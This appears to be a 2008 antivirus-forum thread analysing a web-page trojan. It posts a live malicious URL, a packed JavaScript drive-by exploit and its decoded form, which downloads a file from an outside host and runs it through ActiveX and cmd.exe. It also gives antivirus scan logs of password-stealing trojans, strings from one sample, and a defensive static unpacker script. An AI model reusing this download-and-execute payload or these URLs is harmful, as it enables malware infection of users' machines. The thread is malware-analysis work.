Views: 3477 | Replies: 16

[Virus sample] Web page trojan (drive-by download)

sam.to
Posted 2008-4-26 00:26:25
Exploits a vulnerability in an ActiveX control

http://www.mcdxyey.com/
冷冷
Posted 2008-4-26 00:37:12
Ceker
Posted 2008-4-26 00:52:36

Firefox script parsing result

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('F{i 9=q.E("\\m\\f\\a\\p\\h\\8\\h\\D\\4\\7\\C\\m\\G\\H\\w\\w\\B","");9.J("I","\\j\\4\\4\\g\\L\\l\\l\\s\\8\\3\\p\\d\\7\\v\\v\\x\\d\\x\\7\\n\\3\\4\\l\\A\\o\\z\\7\\a\\8\\8",0);9.y();6.K=1;6.r();6.Y(9.X);k="..\\\\W.10";6.Z(k,2);6.11();i t=q.M("\\u\\j\\3\\5\\5\\7\\V\\g\\g\\5\\f\\a\\o\\4\\f\\h\\n","");i U="\\b\\P\\b\\O\\d\\b";t["\\u\\j\\3\\5\\5\\N\\Q\\3\\a\\s\\4\\3"]("R.T","/c "+k,"","r",0)}S(e){}',62,64,'|||x65|x74|x6c|as|x2e|x73|xml|x63|x30||x31||x69|x70|x6f|var|x68|path|x2f|x4d|x6e|x61|x72|ado|open|x75|shell|x53|x33|x54|x32|Send|x6b|x62|x50|x58|x66|CreateObject|try|x4c|x48|GET|Open|type|x3a|createobject|x45|x34|x38|x78|cmd|catch|exe|Kaspersky|x41|ntuser|responseBody|write|savetofile|com|close'.split('|'),0,{}))
solcroft
Posted 2008-4-26 00:53:59
try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.Open("GET","http://user1.33212.net/bak.css",0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path="..\\ntuser.com";as.savetofile(path,2);as.close();var shell=ado.createobject("Shell.Application","");var Kaspersky="080410";shell["ShellExecute"]("cmd.exe","/c "+path,"","open",0)}catch(e){}

http://user1.33212.net/bak.css
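A static unpacker for the p,a,c,k,e,d format in the two posts above, added here as an example and not code from any thread participant: it rebuilds the word table, substitutes the keys and resolves the hex escapes without evaluating any JavaScript, then checks the decoded text against the COM ProgIDs and methods of the download-and-execute chain. The packed sample inside it is constructed (same packer preamble, dummy URL) and decodes to a harmless stub.

```python
import re

# Constructed sample in the shape of the packed script posted above (same Dean Edwards
# p,a,c,k,e,d preamble); the payload decodes to a harmless stub with a dummy URL.
PACKED_SAMPLE = r'''eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1{2 3=4.5("\\6\\7\\8\\9\\b\\c\\b\\d\\f\\g\\h\\6\\i\\j\\k\\k\\l","");3.m("n","o://p.q/a.r",0);3.s()}t(e){}',62,30,
'|try|var|xml|ado|CreateObject|x4d|x69|x63|x72||x6f|x73|x66||x74|x2e|x58|x4c|x48|x54|x50|Open|GET|http|example|invalid|css|Send|catch'.split('|'),0,{}))'''

# Tail of the packer call: ('payload', radix, count, 'w1|w2|...'.split('|'), ...)
_PACKED_RE = re.compile(
    r"\}\('(?P<p>(?:[^'\\]|\\.)*)',\s*(?P<a>\d+),\s*(?P<c>\d+),\s*'(?P<k>[^']*)'\.split\('\|'\)")
_DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

def encode_key(c, a):
    """Port of the packer's e(): index c -> dictionary key in radix a (0-9, a-z, then A-Z)."""
    prefix = "" if c < a else encode_key(c // a, a)
    c %= a
    return prefix + (chr(c + 29) if c > 35 else _DIGITS[c])

def decode_hex_escapes(s):
    r"""Resolve \xNN escapes left in JS string literals so the COM ProgIDs become readable."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)

def unpack(packed):
    """Rebuild the word table and substitute every \\w+ token, as the packer's own loop does."""
    m = _PACKED_RE.search(packed)
    if not m:
        raise ValueError("not a p,a,c,k,e,d packed script")
    radix, count = int(m["a"]), int(m["c"])
    words = m["k"].split("|")
    payload = re.sub(r"\\(.)", r"\1", m["p"])  # undo the JS string-literal escaping
    table = {}
    for i in range(count):
        key = encode_key(i, radix)
        table[key] = (words[i] if i < len(words) else "") or key  # '' = key maps to itself
    unpacked = re.sub(r"\b\w+\b", lambda w: table.get(w.group(0), w.group(0)), payload)
    return decode_hex_escapes(unpacked)

# ProgIDs and methods that make up the fetch / write-to-disk / execute chain in the decoded post.
ACTIVEX_INDICATORS = ("Microsoft.XMLHTTP", "responseBody", "savetofile",
                      "Shell.Application", "ShellExecute", "cmd.exe")

def suspicious_calls(script):
    """Case-insensitive check of decoded script text against the indicator list."""
    low = script.lower()
    return [ind for ind in ACTIVEX_INDICATORS if ind.lower() in low]

if __name__ == "__main__":
    decoded = unpack(PACKED_SAMPLE)
    print(decoded)
    print("indicators:", suspicious_calls(decoded))
```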
Exia (user account deleted)
Posted 2008-4-26 05:25:23
Starting the file scan:

Begin scan in 'E:\AV\bak.css'
E:\AV\bak.css
      [DETECTION] Is the Trojan horse TR/Dldr.Agent.wtb.1
      [NOTE]      The file was deleted!
zwl2828
Posted 2008-4-26 05:42:42
TO KL
Exia (user account deleted)
Posted 2008-4-26 08:19:07

Reply to post #7 by yimike

All wiped out
Starting the file scan:

Begin scan in 'E:\AV\muma.zip'
E:\AV\muma.zip
  [0] Archive type: ZIP
    --> muma/1.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.abtn
        --> Object
            [DETECTION] Contains detection pattern of the rootkit RKIT/Agent.aji
  --> muma/11.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.abcr
  --> muma/13.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.abtp
    --> muma/16.exe
          [DETECTION] Is the Trojan horse TR/Onlinegames.NVI
    --> muma/19.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.abxd
        --> Object
            [DETECTION] Contains detection pattern of the rootkit RKIT/Agent.aji
  --> muma/2.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.NVI.27
  --> muma/20.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.NVI.53
    --> muma/25.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Is the Trojan horse TR/PSW.12377
        --> Object
            [DETECTION] Contains detection pattern of the rootkit RKIT/Agent.ahy
    --> muma/26.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Contains detection pattern of the rootkit RKIT/Agent.ajp
    --> muma/28.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Contains detection pattern of the rootkit RKIT/Agent.aji
    --> muma/29.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
          [3] Archive type: RSRC
          --> Object
              [DETECTION] Contains detection pattern of the SPR/PortScan.I program
          --> Object
              [DETECTION] Is the Trojan horse TR/Dldr.VB.dzy
        --> Object
            [DETECTION] Is the Trojan horse TR/Dldr.VB.VRF
    --> muma/30.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Is the Trojan horse TR/Dldr.Agent.mzm
    --> muma/7.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.abxk
        --> Object
            [DETECTION] Contains detection pattern of the rootkit RKIT/Agent.aji
    --> muma/8.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Is the Trojan horse TR/PSW.Steal.44658
  --> muma/bak.css
      [DETECTION] Is the Trojan horse TR/Dldr.Agent.wtb.1
      [NOTE]      The file was deleted!


End of the scan: 2008年4月26日  08:20
Used time: 00:23 min

The scan has been done completely.

      0 Scanning directories
     33 Files were scanned
     38 viruses and/or unwanted programs were found
      2 Files were classified as suspicious:
      1 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
     -5 Files not concerned
      1 Archives were scanned
      0 Warnings
      1 Notes

[ This post was last edited by Exia on 2008-4-26 08:28 ]
zwl2828
Posted 2008-4-26 08:41:31
Avira missed 31.exe

Kaspersky only has 31.exe left, TO KL
zwl2828
Posted 2008-4-26 08:43:53

31.exe

MD5: 741431E8F7763251A383546697CFFC46
Upack V0.37 -> Dwing

00017A64   00417A64      0   \Registry\Machine\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\
00017B28   00417B28      0   \Linkage
0001912A   0041912A      0   \BaseNamedObjects\NPF0000000000
0001DFC8   0041DFC8      0   \Registry\Machine\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
0001E088   0041E088      0   \Registry\Machine\System\CurrentControlSet\Services\Tcpip\Linkage
0001E10C   0041E10C      0   \DosDevices\
0001E128   0041E128      0   \Device\
0002C530   0042C530      0   SYSTEM\CurrentControlSet\Services
0002C574   0042C574      0   SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
0002C62C   0042C62C      0   SYSTEM\CurrentControlSet\Services\Tcpip\Linkage
0002C6C4   0042C6C4      0   SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
0002C7AD   0042C7AD      0   system32\drivers\npf.sys
0002C7E0   0042C7E0      0   SYSTEM\CurrentControlSet\Services\NPF
Copyright © KaFan  KaFan.cn All Rights Reserved.